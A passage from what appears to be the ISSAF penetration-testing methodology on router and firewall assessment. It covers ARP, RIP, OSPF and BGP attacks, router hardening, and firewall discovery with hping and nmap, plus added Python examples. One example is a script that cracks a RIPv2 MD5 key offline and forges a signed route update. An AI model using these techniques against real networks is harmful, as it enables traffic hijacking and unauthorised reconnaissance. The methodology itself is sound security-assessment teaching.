ICMP redirects allow an attacker to manipulate host routing tables. An ICMP “redirect” can specify a new gateway for specific networks.
Pre-requisite[s]
Icmp_redir
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
• No icmp-redirects is defined in the router enable mode.
Tool[s]
• icmp_redir
Further Reading[s]
http://www.insecure.org/sploits/arp.games.html
Remarks
K.1.2.15 TEST ARP ATTACKS
Description
In switched networks packets are switched based on MAC addresses and every host on a different network is considered “private”. Gratuitous ARP is used by hosts to announce their IP address. It is a broadcast packet like an ARP request. Manipulation of the ARP cache results in a man-in-the-middle attack. Test if ARP spoofing is possible against this router.
Pre-requisite[s]
ARP cache poisoning tool: Ettercap or Dsniff 1.3
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
• Hard code critical ARP entries in the router and gateway/server(s)
• Private VLANs provide protection against ARP attacks
• Consider static ARP for critical static routers and hosts
• Cisco is developing an ARP firewall
• Consider implementing registration of MAC addresses for customers, suppliers and vendors
• ARPWatch is a freely available tool for ARP attack detection
Tool[s]
• Ettercap, dsniff
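Both J.19 and this test case name ARPWatch as the detection countermeasure. As an added example (not ISSAF's text and not the arpwatch program itself), the following Python script shows the mechanism in miniature: it parses Ethernet/ARP frames, keeps an IP-to-MAC table seeded with the operator's known gateway and server bindings, and raises an alert when a later request, reply or gratuitous ARP claims a different MAC for an address already in the table. The frames, MAC addresses and IP addresses are constructed for the example.

```python
import socket
import struct

ETHERTYPE_ARP = 0x0806
BROADCAST = b"\xff" * 6


def build_arp(oper: int, sha: bytes, spa: str, tha: bytes, tpa: str, dst: bytes = BROADCAST) -> bytes:
    """Constructed Ethernet + ARP frame (oper 1 = request, 2 = reply)."""
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, oper)
           + sha + socket.inet_aton(spa) + tha + socket.inet_aton(tpa))
    return dst + sha + struct.pack("!H", ETHERTYPE_ARP) + arp


def parse_arp(frame: bytes):
    """Return (oper, sender_mac, sender_ip, target_mac, target_ip), or None if not IPv4/Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sha, spa, tha, tpa = frame[22:28], frame[28:32], frame[32:38], frame[38:42]
    return oper, sha, socket.inet_ntoa(spa), tha, socket.inet_ntoa(tpa)


class ArpWatch:
    """Keeps an IP -> MAC table the way arpwatch does and records binding changes."""

    def __init__(self, critical: dict):
        self.critical = dict(critical)        # operator-seeded bindings of gateways/servers
        self.table = dict(critical)
        self.alerts = []

    def observe(self, frame: bytes) -> None:
        parsed = parse_arp(frame)
        if parsed is None:
            return
        _oper, sha, spa, _tha, tpa = parsed
        if spa == "0.0.0.0":                  # ARP probe: claims no binding
            return
        known = self.table.get(spa)
        if known is None:
            self.table[spa] = sha             # first sighting: learn it
        elif known != sha:
            kind = "critical host" if spa in self.critical else "host"
            note = " (gratuitous ARP)" if spa == tpa else ""
            self.alerts.append(f"{spa}: {kind} moved from {known.hex(':')} to {sha.hex(':')}{note}")
            self.table[spa] = sha


if __name__ == "__main__":
    gateway, rogue = bytes.fromhex("00aa00000001"), bytes.fromhex("00bb00000002")
    watch = ArpWatch({"10.0.0.1": gateway})
    watch.observe(build_arp(1, rogue, "10.0.0.1", bytes(6), "10.0.0.1"))   # rogue gratuitous ARP
    print(watch.alerts)
```

A change for an address listed in the critical table is the signal the countermeasures above target with static ARP entries: if the gateway's binding is hard-coded on the hosts, the alert still fires on the watcher but the hosts' caches are not rewritten.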
Further Reading[s]
Remarks
K.1.3 Routing Protocol Assessment
Many routing protocols have weak or no authentication. Spoofed routing table updates can manipulate tables. RIP is the most common. It is recommended to filter routing protocols and use authentication on them.
K.1.3.1 AUTONOMOUS SYSTEM SCANNING
Description
Pre-requisite[s]
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Page 604 of 1123
K.1.3.2 RIP (ROUTING INFORMATION PROTOCOL) TESTING
Description
There are two versions of the Routing Information Protocol (RIP): version 1 and version 2. RIP
version 1 does not support authentication of routing updates, so any host on the segment can sniff
them and inject its own; RIP version 2 supports both plain text and MD5 (keyed hash)
authentication.
Pre-requisite[s]
RIP version 1 does not support any authentication, so updates can be read and forged with a
sniffer and a packet crafter.
RIP version 2 supports authentication; depending on the mode in use you need:
• a sniffer to gather authenticated updates and a password cracking tool, if MD5 authentication is
used
• only a sniffer, if clear text authentication is used (the password is visible in every update)
Process
With MD5 authentication both routers share the same secret key. The key itself is never
transmitted: it is appended to the update and the MD5 digest of update-plus-key is carried in the
packet trailer (RFC 2082). An attacker who sniffs a single authenticated update can therefore run
an offline dictionary or brute force attack against the digest; once the key is recovered the attacker
can forge updates that the routers accept, which is the basis of a man-in-the-middle attack on the
routing. Note that authentication does not encrypt the update: the routes themselves are readable
without the key.
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
RIP version 1 is not suitable from a security point of view. RIP version 2 updates with clear text
authentication are broken trivially, because the password travels in every update. MD5
authentication should be used, the shared secret should be strong (RIP uses at most 16 bytes of the
key string) and each key should be given a definite lifetime with "accept-lifetime" and
"send-lifetime" so that a recovered key is not useful indefinitely. Configuration on Cisco IOS is as
follows; the key chain must also be bound to every RIP interface (the interface name is an
example):
Central(config)# key chain asdf
Central(config-keychain)# key 1
Central(config-keychain-key)# key-string asdaaajas-a431
Central(config-keychain-key)# exit
Central(config-keychain)# key 2
Central(config-keychain-key)# key-string khfhgdsdj-16allsd-32hsa
Central(config-keychain-key)# exit
Central(config-keychain)# exit
Central(config)# interface FastEthernet0/0
Central(config-if)# ip rip authentication mode md5
Central(config-if)# ip rip authentication key-chain asdf
Central(config-if)# end
Tool[s]
L0pht crack, John the Ripper
Further Reading[s]
Routing & Switching by Jeff Doyle, Part I
Remarks
K.1.3.3 OPEN SHORTEST PATH FIRST (OSPF) TESTING
Description
Open Shortest Path First (OSPF) supports two forms of authentication: plain text and MD5. Plain
text authentication gives no protection against a sniffer and should be used only when
neighbouring devices do not support the more secure MD5 authentication.
Pre-requisite[s]
OSPF supports authentication; depending on the mode in use you need:
• a sniffer to gather authenticated packets and a password cracking tool, if MD5 authentication is
used
• only a sniffer, if clear text authentication is used
Process
As with RIP version 2, OSPF MD5 authentication uses a shared secret on both routers: the key is
appended to the packet, the MD5 digest is sent with the packet, and a sniffed packet allows an
offline dictionary or brute force attack on the key. With the key recovered the attacker can forge
OSPF packets that neighbours accept and so redirect traffic (a man-in-the-middle attack on the
routing). The packets themselves remain readable without the key.
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
OSPF updates with clear text authentication are broken trivially. MD5 authentication should be
used, the shared secret should be strong (up to 16 characters) and the key should be rotated with a
definite lifetime so that a recovered key cannot be used indefinitely. Configuration on Cisco IOS is
as follows (the interface name is an example):
CENTRAL(config)# router ospf 1
CENTRAL(config-router)# network 10.1.0.0 0.0.255.255 area 1
CENTRAL(config-router)# area 1 authentication message-digest
CENTRAL(config-router)# exit
CENTRAL(config)# interface Ethernet0/0
CENTRAL(config-if)# ip ospf message-digest-key 1 md5 UUGGFGGG321-JH4
Tool[s]
L0pht crack, John the Ripper
Further Reading[s]
Routing & Switching by Jeff Doyle, Part I
Remarks
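The attack described in the RIP and OSPF sections above, as an added example that is not part of ISSAF or of any router vendor's software: it builds a RIPv2 update with keyed-MD5 authentication (RFC 2082), verifies it as a receiving router would, shows that the routes are readable without the key, recovers a weak key from one sniffed update by dictionary attack, and signs a forged update with the recovered key. The same keyed-digest construction (MD5 over packet followed by the padded secret) is what OSPF MD5 authentication uses, so the cracking step applies to both. Routes, the key (the one from the page's sample configuration) and the wordlist are constructed; Auth Data Len is written as 16, the RFC value, whereas Cisco writes 20.

```python
"""RIPv2 keyed-MD5 authentication (RFC 2082) built, verified and attacked offline.
Added example, not part of ISSAF or any vendor's code. Sample data is constructed."""
import hashlib
import hmac
import struct

KEY_LEN = 16        # RFC 2082: secret of 1..16 bytes, zero padded to 16 when hashed
DIGEST_LEN = 16
AUTH_HDR_LEN = 20   # afi, type, packet length, key id, auth len, sequence, 8 reserved

ROUTES = [("10.1.0.0", "255.255.0.0", "0.0.0.0", 1),
          ("10.2.0.0", "255.255.0.0", "0.0.0.0", 3)]
WEAK_KEY = "asdaaajas-a431"
WORDLIST = ["cisco", "password", "rip2rip", "asdaaajas-a431", "changeme"]


def ipv4(dotted):
    return bytes(int(octet) for octet in dotted.split("."))


def _padded_key(key):
    raw = key.encode()
    if not 1 <= len(raw) <= KEY_LEN:
        raise ValueError("RIPv2 MD5 key must be 1-16 bytes")
    return raw.ljust(KEY_LEN, b"\x00")


def build_update(routes, key, key_id=1, seq=1):
    """Signed RIPv2 response: header, auth header, route entries, auth trailer."""
    header = struct.pack("!BBH", 2, 2, 0)             # command 2 = response, version 2
    body = b"".join(struct.pack("!HH4s4s4sI", 2, 0, ipv4(p), ipv4(m), ipv4(n), metric)
                    for p, m, n, metric in routes)
    pkt_len = len(header) + AUTH_HDR_LEN + len(body)  # length without the trailer
    auth_hdr = struct.pack("!HHHBBI8s", 0xFFFF, 3, pkt_len, key_id, DIGEST_LEN, seq, b"\x00" * 8)
    unsigned = header + auth_hdr + body + struct.pack("!HH", 0xFFFF, 1)
    # The secret never travels: the digest over (packet || padded key) stands in for it.
    return unsigned + hashlib.md5(unsigned + _padded_key(key)).digest()


def verify_update(packet, key):
    """What a receiving router does: recompute the digest with its copy of the key."""
    unsigned, digest = packet[:-DIGEST_LEN], packet[-DIGEST_LEN:]
    return hmac.compare_digest(hashlib.md5(unsigned + _padded_key(key)).digest(), digest)


def parse_routes(packet):
    """Authentication is not confidentiality: routes are readable without the key."""
    offset, end, routes = 4 + AUTH_HDR_LEN, len(packet) - DIGEST_LEN - 4, []
    while offset < end:
        _afi, _tag, p, m, n, metric = struct.unpack("!HH4s4s4sI", packet[offset:offset + 20])
        routes.append(tuple(".".join(map(str, x)) for x in (p, m, n)) + (metric,))
        offset += 20
    return routes


def crack_key(packet, wordlist):
    """Offline dictionary attack on one sniffed update; no contact with the routers."""
    for candidate in wordlist:
        try:
            if verify_update(packet, candidate):
                return candidate
        except ValueError:      # longer than 16 bytes: cannot be the key
            continue
    return None


if __name__ == "__main__":
    sniffed = build_update(ROUTES, WEAK_KEY)
    key = crack_key(sniffed, WORDLIST)
    # With the key the attacker signs a default route pointing at a host of his choice.
    forged = build_update([("0.0.0.0", "0.0.0.0", "192.0.2.66", 1)], key, seq=2)
    print("recovered key:", key, "forged update accepted:", verify_update(forged, WEAK_KEY))
```

The sequence number in the authentication header is the only replay protection the scheme offers: a router is expected to discard updates whose sequence number is not greater than the last one accepted from that neighbour, so a forged update must carry a fresh sequence number as well as a valid digest. Nothing in the construction slows down offline guessing, which is why the key strength and lifetime in the countermeasure matter.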
K.1.3.4 BORDER GATEWAY PROTOCOL (BGP) TESTING
Description
BGP is the exterior routing protocol used to communicate between different Autonomous
Systems. A BGP session can be hijacked and incorrect routing information injected through the
hijacked session. BGP runs over TCP (port 179), so session hijacking is easy for anyone who can
observe the TCP sequence numbers of the session.
Pre-requisite[s]
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Protect the session with anti-spoofing filters on the peering interfaces and with the TCP MD5
signature option (RFC 2385; "neighbor <peer-ip> password <secret>" on Cisco IOS), which
authenticates every TCP segment of the session with a shared secret.
Tool[s]
Further Reading[s]
Remarks
K.1.3.5 IRDP TESTING
Description
The ICMP Router Discovery Protocol (IRDP) is used by hosts to find the nearest router to use as
a default gateway, using ICMP router advertisement and router solicitation messages. An attacker
can spoof router advertisements and change a host's default route, diverting the host's traffic
through the attacker's machine, which is harmful for the network.
Pre-requisite[s]
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Disable router discovery on the hosts running the protocol; the setting is a registry entry that
depends on the operating system:
Windows 98/ME:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\NetTrans\000n (where "000n" is
the entry whose "DriverDesc" value is TCP/IP)
PerformRouterDiscovery="0" (DWORD value)
Windows 2000:
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\<interface>
PerformRouterDiscovery="0" (REG_DWORD, range 0, 1, 2: 0 = disabled, 1 = enabled,
2 = enabled only if DHCP sends the router discovery option)
Tool[s]
Further Reading[s]
Remarks
K.1.3.6 EIGRP (DISCOVERY)
Description
EIGRP is a proprietary routing protocol of Cisco Systems. Authentication of its packets has been
supported since IOS version 11.3. EIGRP route authentication is configured like RIP version 2 (a
key chain bound to the interface), but EIGRP supports only MD5 authentication, not plain text; as
with RIP and OSPF, authentication protects the integrity of the updates and does not encrypt them.
Pre-requisite[s]
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
K.1.4 Assess Denial of Service Attacks
Secure router configuration plays a big role in avoiding denial of service and distributed denial
of service attacks.
Network based denial of service attacks fall into two categories:
• Malformed packet attacks
• Packet flood attacks
Malformed packet attack – the attacker sends a single packet, or a small stream of packets, formed
in a way the developers of the target did not anticipate. A system that is not designed to handle
such strangely formed packets may crash, e.g. ping of death (an oversized ICMP echo request).
Packet flood attack – the attacker sends more packets than the destination can process, e.g. SYN
floods.
K.2 GLOBAL COUNTERMEASURES
Routing devices are critical components. They have "host" specific (routed) and network
specific (routing) weaknesses. Correct configuration and diligence are very important for
router security.
K.2.1 Turn on logging
Configure logging and monitor logs on a regular basis. Analysis of logs identifies malicious
activity and provides early warning.
• External router scanning is generally not detected by a Network Intrusion Detection System;
log it on the router.
• Packets filtered by access control lists are likewise generally not seen by a Network Intrusion
Detection System; log them.
  o Send the logs to a central syslog host; command for Cisco routers: "logging <IP-address>"
  o Record activity that violates access lists, e.g. "access-list 99 deny 192.168.0.0 0.0.255.255 log"
K.2.2 Limit Telnet access
Routers can be remotely managed over Telnet, which sends credentials in clear text. Limit or
even disable Telnet access (use SSH where the platform supports it) and allow administration
from the console port. If remote management is required, restrict it to specific source IP
addresses with an access list on the vty lines.
K.2.3 Protect passwords
Protect passwords stored in the configuration with MD5 or an equivalent hashing algorithm (on
Cisco IOS, "enable secret" stores an MD5 hash). Where only reversible encryption is available
(Cisco "service password-encryption", type 7 strings), use it to scramble the password strings,
but treat it as obfuscation only: type 7 strings are trivially decoded by anyone who obtains the
configuration.
K.2.4 Change router banner
Configure a login banner that warns users against unauthorized access; this may help in the
event of legal action against an intruder. Banners must not reveal system information (platform,
software version, location).
K.2.5 Limit local access
By default, when connecting to the console or AUX port, routers give user EXEC mode access
without a password. If the router cannot be physically secured, set a password (and an idle
timeout) on these ports.
K.2.6 Secure SNMP
A common method of router management is the Simple Network Management Protocol (SNMP).
SNMP versions 1 and 2c were not designed with authentication and data privacy features: the
community string travels in clear text. It is recommended that SNMP is disabled on external
routers; if it must be enabled, use a hard-to-guess community string, permit access only from
specific management hosts (apply an access list to the community) and prefer read-only
communities.
K.2.7 Disable all other non-essential services on routers
By default, routers have services enabled which allow attackers to gain information and
perform Denial of Service attacks. Disable services including finger, bootp, http and CDP unless
they are required.
K.2.8 Configure anti-spoofing
Where the firewall in use does not support anti-spoofing, configure it on the router. Nobody
from the outside network should be sending packets with a source address of your inside
network or of well-known reserved addresses (RFC 1918 ranges, loopback, broadcast). Access
lists can be used to drop and log these packets.
K.2.9 Configure ingress filtering
To protect against untrusted hosts or users on the inside network, use ingress filtering on the
internal interface as well: deny packets whose source address does not belong to the internal
network. This prevents malicious inside users from launching some Denial of Service (DoS)
attacks that rely on spoofed source addresses.
K.2.10 Disable IP directed broadcast
Directed broadcasts are used extensively in denial of service attacks including smurf. It is
recommended that IP directed broadcasts are dropped by the router ("no ip directed-broadcast"
on each interface on Cisco IOS) to prevent the network from being used as an amplifier for
Distributed Denial of Service attacks.
K.2.11 Limit ICMP
Several Denial of Service attacks use the ICMP protocol. The types of ICMP messages allowed
should be limited. At a minimum, in order to allow Path MTU discovery (PMTUD) to work,
permit "fragmentation needed" messages (ICMP type 3 code 4, the packet-too-big message). The
other types of ICMP messages can be disabled.
K.2.12 Implement TCP intercept
Implement TCP intercept to mitigate SYN floods: the router completes the TCP handshake on
behalf of the server and only passes established connections through.
K.2.13 Reflexive access lists to prevent connection hijacking on the internet router
K.2.14 Use CBAC
Use CBAC (Context-Based Access Control) on intranet and extranet routers where you do not
have a dedicated firewall. CBAC filters TCP and UDP packets based on application layer
protocol information and keeps per-connection state.
K.2.15 Router based IDS
Implement a router based Intrusion Detection System (IDS).
K.2.16 Authentication proxy and AAA
Use authentication proxy and AAA on the router where you do not have a separate proxy server.
L FIREWALL SECURITY ASSESSMENT
L.1 DESCRIPTION
The following paragraphs give more insight into the what, why, benefits and types of firewalls
in common use.
L.1.1 What is a Firewall?
A hardware / software solution which ‘sits’ in between two (or more) networks,
separating them from each-other and ensuring that access between the networks is
controlled.
L.1.2 Why Firewall?
• Reduces risk by protecting systems from attempts to exploit vulnerabilities
• Increases privacy: makes it harder to gather intelligence about your network
• Enforces your organization's security policy
L.1.3 Benefits of Firewall
• Limiting incoming connections to only those explicitly allowed
• Limiting outgoing connections to only those explicitly allowed
• Performing ingress and egress filtering
• Performing basic intrusion detection
• Logging of all traffic to and from the network
L.1.4 Types of Firewalls
L.1.4.1 PACKET FILTER FIREWALL
• Checks traffic against an access control list (ACL)
• Typically filters traffic based on
  o Source and destination IP address
  o Source and destination port
• Basic level of security
• Data contents of packets passed by the filter are not checked
• Fastest
• IP fragments are not re-assembled before rule verification
• Examples: ipchains, router ACLs
L.1.4.2 STATEFUL FIREWALL
• Maintains the state of each connection by keeping track of sequence numbers
• Matches inbound traffic to outbound requests
• 2nd fastest
• Major implementations
  o Stateful inspection – Check Point FW-1
  o Cut-through proxy – Cisco PIX
  o IP Tables
  o Ipt
  o Netscreen
Stateful inspection (Check Point FW-1) derives the state it filters on from:
  o Communication derived state: the state derived from previous communications
  o Application derived state: the state information derived from other applications
  o Information manipulation: the evaluation of flexible expressions based on all the above factors
L.1.4.3 CIRCUIT LEVEL GATEWAYS / PROXIES
• Proxy means that the connection is "broken": the proxy terminates the client connection and
opens its own connection to the server, so the headers are rewritten
• Generally they don't check at the application level
• Routing is not enabled, since all connections are terminated on the proxy and all connections
are started from the proxy
L.1.4.4 APPLICATION GATEWAYS
• Similar to circuit level gateways / proxies
• Application level checking is performed
• Maintains complete connection state and sequencing through 2 connections
  o Client to proxy
  o Proxy to server
• Doesn't allow the client to connect directly to the server
• Slowest
• Examples
  o Gauntlet
  o Symantec Enterprise Firewall (previously "Raptor")
  o Watchguard Fireboxes
L.1.4.5 STEALTH/BRIDGE FIREWALL
• "Invisible"
• Transparent bridge
• Doesn't need IP addresses on the filtering interfaces
• Interfaces are in promiscuous mode
• Accessible only from the console or through a dedicated management interface
L.1.4.6 HARDWARE FIREWALL APPLIANCES
• Integrated hardware solution
• All software including the OS comes preloaded on the platform
• Network "black box" approach to security
• Pre-hardened, limited services open, hence fewer vulnerabilities and more secure
• Faster because everything is embedded in the hardware (e.g. no hard drive is needed)
• Examples:
  o Netscreen (filtering implemented in ASICs)
L.1.4.7 APPLICATION LEVEL FIREWALLS
• Protect a single application (e.g. HTTP)
• Examples
  o Sanctum AppShield
  o DMZ Shield (Ubizen)
  o ...
L.1.5 Against what can a firewall not protect?
• Attacks originating from the protected network (from the inside)
• Authorized malicious access
• Attacks and exploits on ports that are open through the firewall (if the firewall isn't an
application level firewall)
• Attacks that do not pass through the firewall
• Attacks originating from backdoor access points (wireless access points, modems, ...)
L.1.6 How Do Firewalls work?
• Packets that match an allow rule are passed
• Packets that don't match are rejected (preferably dropped)
• Critical attack information lies in the rejected packets
• Most packet filter and stateful firewalls evaluate rules in a "top-down" fashion, while proxy
based firewalls don't
• Most firewalls have a default drop rule (explicitly deny what is not allowed)
L.1.7 Best practices for Logging
• Minimal logging for common traffic
• No logging for noisy traffic
• Maximum logging for the rest
L.1.8 Address Translation
There are two types of address translation: Port Address Translation (PAT) and Network
Address Translation (NAT)
PAT is also known as "hide NAT": everything is hidden behind the external firewall IP address,
with the source port used to tell the connections apart.
NAT is also known as "static NAT": every IP address that has to be translated is mapped
one-to-one onto an additional IP address. This sometimes needs routing (or proxy ARP) to work.
Check Point now has a new way of working with static NAT: the translation is performed on the
client side of the gateway so that no static routes are necessary anymore.
L.2 PURPOSE
The purpose of this document is to aid in the assessment of the security of a firewall
installation and configuration.
L.3 REQUIREMENT
L.3.1 Understand Organization’s environment
Before the assessment can take place, a study of the organization’s network
environment should be performed.
L.3.2 Technical Requirements
To perform the penetration testing part of this assessment, a list with all IP addresses
together with a network diagram is a must.
To perform the system security assessment, access to the firewall configuration itself is
a must (this either through the console or through a management solution).
L.4 TERMINOLOGY
L.5 HISTORY
L.6 OBJECTIVE
L.6.1 Perspective One
e.g. Security Assessor/Penetration Tester
L.6.2 Perspective Two
e.g. System Administrator
L.7 EXPECTED RESULT
A list with all pro’s and con’s of the currently installed firewall setup.
L.8 METHODOLOGY / PROCESS
• Locating the firewall
• Identifying common misconfigurations
• Testing general attacks on firewalls
• Testing product specific issues
Locating the Firewall
• Perform reverse DNS lookups on the target IP range (sometimes the firewall is registered in
DNS)
• Perform a regular traceroute towards the target IP range
• Perform a TCP traceroute towards a system behind the firewall
• Perform hping scans to a firewalled system (web server / mail server)
Look for ICMP messages coming back from the firewall. These can lead to the discovery of the
firewall IP address.
Identify Common Misconfiguration[s]
All tests mentioned in the Router Misconfiguration section apply.
• Firewall rule-set mapping (firewalk)
• Port scanning a system behind the firewall can also be helpful
Test General Attacks on Firewalls
• Port redirection
• Firewall backdoors
Test Product specific issues
• CheckPoint Firewall-1
• CheckPoint NG
• Nokia IPSO
• Cisco PIX
• Microsoft ISA
• Microsoft Proxy
• Borderware
• Gauntlet
• IP Tables / ipchains
• Others
L.9 LOCATE THE FIREWALL
L.9.1 Expect Admin Prohibited Packets with Source of Firewall
Description
Craft a SYN packet using hping or any other packet crafter. If you get an ICMP destination
unreachable message with code 13 (communication administratively prohibited, i.e. ICMP type 3
code 13) carrying the source IP address of the access control device, that device is usually a
packet filtering firewall or router that rejects rather than drops.
Pre-requisite[s]
None
Examples/Results
hping www.target.com -c 2 -S -p 23 -n
HPING www.target.com (eth0 192.168.0.1): S set, 40 data bytes
ICMP Unreachable type 13 from 192.168.100.100
Analysis/Conclusion/Observation
• hping reports an ICMP unreachable with code 13 from 192.168.100.100
• This is an administratively prohibited message
• Generally it signifies an access control system (firewall/router) rejecting the packet;
192.168.100.100 is that device
Countermeasures
Prevent the border router from sending administratively prohibited messages (ICMP type 3
code 13):
• For Cisco: "no ip unreachables" on the interface (this also suppresses the other unreachable
messages)
• Refer to the product manual for other platforms
Block outgoing traffic originating from the firewall itself (a "stealth" rule), so that rejects
become silent drops.
Tool[s]
• hping
• TCP traceroute
Further Reading[s]
Remarks
L.9.2 Traceroute and Identify Possible Network Range
Description
Traceroute will tell you several things about a network:
• the path to that network
• intermediate routers and/or devices
• potential information about filtering devices and about the protocols they allow
Consider some facts:
  o Generally a firewall will not return ICMP TTL expired messages
  o In small and medium size networks the firewall is located one hop before the target
  o In large networks you get a big network range and it is difficult to identify the firewall
By default Windows tracert uses ICMP echo requests and UNIX/Linux traceroute uses UDP probes
to high ports; TCP traceroute tools (tcptraceroute, hping) use TCP SYN probes, which may pass
where ICMP and UDP are blocked.
Pre-requisite[s]
Steps to be performed
• Traceroute over ICMP, UDP and TCP towards the target
• Analyze the results
  o Where were ICMP messages dropped / rejected?
  o Where were UDP messages dropped / rejected?
  o Where were TCP messages dropped / rejected?
• Identify the possible network range
Examples/Results
Hop   ICMP                  UDP                   TCP
10    XXX.XXX.10.1          XXX.XXX.10.1          XXX.XXX.10.1
11    XXX.XXX.20.2          XXX.XXX.20.2          XXX.XXX.20.2
12    XXX.XXX.30.3          XXX.XXX.30.3          XXX.XXX.30.3
13    XXX.XXX.40.4          XXX.XXX.40.4          XXX.XXX.40.4
14    XXX.XXX.50.5          XXX.XXX.50.5          XXX.XXX.50.5
15    XXX.XXX.60.6          XXX.XXX.60.6          XXX.XXX.60.6
16    XXX.XXX.70.7          XXX.XXX.70.7          XXX.XXX.70.7
17    XXX.XXX.80.8          XXX.XXX.80.8          XXX.XXX.80.8
18    XXX.XXX.90.9          XXX.XXX.90.9          XXX.XXX.90.9
19    * * *                 XXX.XXX.100.10        XXX.XXX.100.10
20    * * *                 * * *                 * *
21                          * * *                 * *
22                                                XXX.XXX.110.11 [open]
Analysis/Conclusion/Observation
ICMP probes are answered up to hop 18 (XXX.XXX.90.9) and blocked beyond it.
UDP probes are answered up to hop 19 (XXX.XXX.100.10) and blocked beyond it.
TCP probes to HTTP port 80 pass through to the target host at hop 22 (XXX.XXX.110.11).
The intermediate devices at hops 20 and 21 do not disclose their IP address, device name or
domain name: they forward the TCP probe but return no TTL exceeded message, which is typical
firewall behaviour, so the firewall is most likely at hop 20 or 21.
Attempts to guess the device IP addresses at hops 20 and 21 in the range xxx.xxx.110.x to
xxx.xxx.110.x failed.
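The comparison drawn above, as an added example that is not part of ISSAF: a parser for traceroute output feeds an analysis that reports, per protocol, the last answering hop, whether the target was reached, and which hops stayed silent on a protocol that still got through, which is where a device that does not return TTL exceeded (typically the firewall) sits. The three traces are constructed to mirror the table on the page, with fewer hops and documentation-range addresses in place of the XXX.XXX values; the parser takes the first IPv4 address on a hop line and treats lines with only "*" as silent, so Unix traceroute, tcptraceroute and Windows tracert output all work.

```python
"""Differential traceroute analysis (ICMP vs UDP vs TCP). Added example, not part
of ISSAF; the traceroute text below is constructed."""
import re

HOP_LINE = re.compile(r"^\s*(\d+)\s+(.*)$")
IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")

COMMON = (" 1  203.0.113.1 (203.0.113.1)  0.9 ms  0.8 ms  0.8 ms\n"
          " 2  203.0.113.9 (203.0.113.9)  4.1 ms  4.0 ms  4.2 ms\n"
          " 3  203.0.113.17 (203.0.113.17)  9.7 ms  9.5 ms  9.9 ms\n")
SAMPLE_TRACES = {
    "icmp": COMMON + " 4  * * *\n 5  * * *\n",
    "udp":  COMMON + " 4  203.0.113.25 (203.0.113.25)  12.3 ms  12.1 ms  12.4 ms\n"
                     " 5  * * *\n 6  * * *\n",
    "tcp":  COMMON + " 4  203.0.113.25 (203.0.113.25)  12.3 ms  12.1 ms  12.4 ms\n"
                     " 5  * *\n 6  * *\n"
                     " 7  198.51.100.11 (198.51.100.11) [open]  20.1 ms  19.8 ms\n",
}
TARGET = "198.51.100.11"


def parse_traceroute(text):
    """{hop: ip or None}; a hop line without a responding address maps to None."""
    hops = {}
    for line in text.splitlines():
        match = HOP_LINE.match(line)
        if match:
            ip = IPV4.search(match.group(2))
            hops[int(match.group(1))] = ip.group(1) if ip else None
    return hops


def analyze(traces, target_ip):
    """Per protocol: last answering hop, whether the target was reached, where the
    protocol is blocked. Silent hops before the target, on a protocol that still reaches
    it, are candidate positions for the filtering device."""
    report = {}
    for proto, text in traces.items():
        hops = parse_traceroute(text)
        answered = [h for h, ip in sorted(hops.items()) if ip]
        last = answered[-1] if answered else None
        reached = next((h for h, ip in sorted(hops.items()) if ip == target_ip), None)
        report[proto] = {"last_responding_hop": last,
                         "last_responder": hops.get(last),
                         "reached_target_at": reached,
                         "blocked_after": None if reached else last}
    passing = [p for p in traces if report[p]["reached_target_at"]]
    candidates = set()
    for proto in passing:
        hops = parse_traceroute(traces[proto])
        candidates |= {h for h, ip in hops.items()
                       if ip is None and h < report[proto]["reached_target_at"]}
    report["protocols_reaching_target"] = passing
    report["candidate_filter_hops"] = sorted(candidates)
    return report


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_TRACES, TARGET).items():
        print(key, value)
```

In practice the candidate hop list is what you probe next: a TCP traceroute to the target with the source port of an allowed service, or hping with the TTL set to each candidate, tells you which of the silent hops answers at all.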
Tool[s]
Traceroute utility (traceroute on *nix and tracert on windows)
Countermeasures
Prevention Mechanism
• Prevent the access control devices (router/firewall) from answering expired-TTL packets with
ICMP time exceeded, and filter such messages coming from the devices behind them, e.g. on a
Cisco router:
> access-list 151 deny icmp any any 11 0 ! ttl-exceeded (ICMP type 11, code 0)
Note that on Cisco IOS an outbound access list does not filter packets the router itself generates,
so this line only suppresses time exceeded messages from devices behind the router.
Detection Mechanism
Configure the Network Intrusion Detection System to monitor for ICMP, UDP and TCP packets
arriving with TTL = 1 (or another very small TTL), which indicates tracing.
Further Reading[s]
Remarks
L.9.3 Perform Port Scan on Default Firewall Ports and Grab Banners
Port scanning is easy to perform but noisy; still, good results can be obtained with a structured
approach:
1. Use information gathered from publicly available sources about the firewall implemented in
the target network (if any was found) and scan only the default ports of that firewall.
2. Give priority to the information you consider most reliable.
3. Send very few connections (two connections per host should be appropriate) to avoid
detection (although "good" firewalls should not have any problems with lots of connections
nowadays).
4. If you are lucky and find an open port, identify the service by establishing a connection to the
relevant service on that port.
5. If you have not found a default port, randomize the scan (by using multiple source/destination
ports and hosts) and perform it on all default firewall ports mentioned in the firewall default
port list in the appendix, plus any others you know of.
6. Finally, if the above steps bring no success, scan the entire network range on all ports using
the scanning techniques that follow.
L.9.4 Perform Port Scan on Default Firewall Ports and Grab Banners – Port Scanning
Description
Most firewall implementations have default ports in use for remote management or for other
purposes (such as user authentication, VPN solutions, high availability, ...).
Pre-requisite[s]
None
Examples/Results
#nmap -n -vv -P0 -p 256,1080 <www.target.com>
Analysis/Conclusion/Observation
• -n disables DNS resolution and -P0 skips host discovery (ping), so the scan proceeds even
when the host does not answer ICMP
• -vv gives very verbose output; it helps in identifying the firewall architecture / system
Countermeasures
